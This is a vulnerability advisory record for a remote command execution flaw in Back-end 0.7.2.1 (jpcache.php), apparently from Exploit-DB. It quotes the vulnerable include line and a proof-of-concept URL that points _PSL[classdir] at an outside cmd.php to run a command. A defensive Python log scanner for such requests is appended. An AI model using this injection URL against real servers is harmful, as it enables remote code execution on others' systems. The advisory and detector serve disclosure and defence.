Vendor: N/A
By: Federico Fazzi
CVSS: 7.5 (HIGH)
Remote Command Execution
CWE: 78
Product Name: N/A
Affected Version From: 0.7.2.1
Affected Version To: 0.7.2.1
Patch Exists: NO
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2006

Back-end = 0.7.2.1 (jpcache.php) Remote command execution

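Back-end has a default path preset in jpcache.php: line 40 builds the include directory from $_PSL['classdir'], and the proof-of-concept request supplies that value in the query string, so an attacker can execute a remote command.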

Mitigation:

Ensure that the default path is not set in jpcache.php and that all user input is properly validated.

Exploit-DB raw data:

# Federico Fazzi, <federico@autistici.org>
# Back-end = 0.7.2.1 (jpcache.php) Remote command execution
# 08/06/2006 1:04
# Bug:
#
# jpcache.php: line 40
#
# ---
# $includedir = $_PSL['classdir'] . "/jpcache";
# ---
#
# Proof of concept:
#
# Back-end has a default path pre-set in jpcache.php,
# and a cracker can execute a remote command.
#
# http://example/[be_path]/class/jpcache/jpcache.php?_PSL[classdir]=http://example/cmd.php?exec=uname

# milw0rm.com [2006-06-08]
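
A detection sketch for the request shape in the proof of concept above, added here as an example and not part of the original advisory or of Back-end's code: it scans web-server access-log lines for query parameters that address the _PSL array and separates URL-valued ones from other overrides. The combined log format, the /be/ install path and the sample lines are assumptions constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qsl

# Request field of a combined-format access log: "METHOD target PROTOCOL"
REQUEST_RE = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')
# Query keys that address the $_PSL array, e.g. _PSL[classdir]
PSL_KEY_RE = re.compile(r'^_PSL(\[|$)')
# Values that begin with a URL scheme or stream wrapper (http://, ftp://, ...)
REMOTE_VALUE_RE = re.compile(r'^\s*[a-z][a-z0-9+.\-]*://', re.IGNORECASE)

# Constructed sample lines: /be/ stands in for [be_path], addresses are documentation ranges
SAMPLE_LOG = [
    '192.0.2.10 - - [08/Jun/2006:01:10:00 +0000] "GET /be/class/jpcache/jpcache.php'
    '?_PSL[classdir]=http://example/cmd.php?exec=uname HTTP/1.1" 200 512',
    '192.0.2.11 - - [08/Jun/2006:01:11:00 +0000] "GET /be/index.php'
    '?_PSL%5Bclassdir%5D=%2Ftmp HTTP/1.1" 200 900',
    '192.0.2.12 - - [08/Jun/2006:01:12:00 +0000] "GET /be/index.php?article=12 HTTP/1.1" 200 4096',
]

def psl_params(log_line):
    """Return [(key, value)] for every _PSL[...] query parameter in one log line."""
    match = REQUEST_RE.search(log_line)
    if not match:
        return []
    query = urlsplit(match.group(1)).query
    # parse_qsl percent-decodes keys and values, so %5B/%5D spellings are caught too
    return [(key, value)
            for key, value in parse_qsl(query, keep_blank_values=True)
            if PSL_KEY_RE.match(key)]

def classify(log_line):
    """'remote-include' if a _PSL value is a URL, 'override' if _PSL is set at all, else None."""
    hits = psl_params(log_line)
    if not hits:
        return None
    if any(REMOTE_VALUE_RE.match(value) for _, value in hits):
        return "remote-include"
    return "override"

if __name__ == "__main__":
    for line in SAMPLE_LOG:
        print(classify(line), "|", line)
```

Only the query string is visible in an access log, so parameters sent in a POST body or a cookie need a different data source.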